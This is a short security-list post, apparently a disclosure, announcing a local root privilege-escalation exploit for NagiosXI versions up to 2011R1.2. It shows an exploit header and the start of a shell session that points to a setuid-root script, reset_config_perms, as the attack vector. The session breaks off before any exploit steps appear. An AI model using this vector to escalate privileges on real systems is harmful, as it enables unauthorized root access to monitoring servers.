NagiosXI (commerciale Nagios) Local Root

Posted by rootbsd on May 12

# Exploit Title: NagiosXI (Commercial Nagios) Local Root Vulnerability
# Date: 2011-05-15
# Author: RootBSD
# Software Link: http://www.nagios.com
# Version: <= 2011R1.2
# Tested on: all linux

rootbsd () laptop:~$ id
uid=1001(rootbsd) gid=1001(rootbsd) groupes=1001(rootbsd)
rootbsd () laptop:~$ ls -l /usr/local/nagiosxi/scripts/reset_config_perms
-rwsr-xr-x 1 root nagios 5258 2011-04-11 20:38 reset_config_perms
rootbsd () laptop:~$ cat…

Source: NagiosXI (commerciale Nagios) Local Root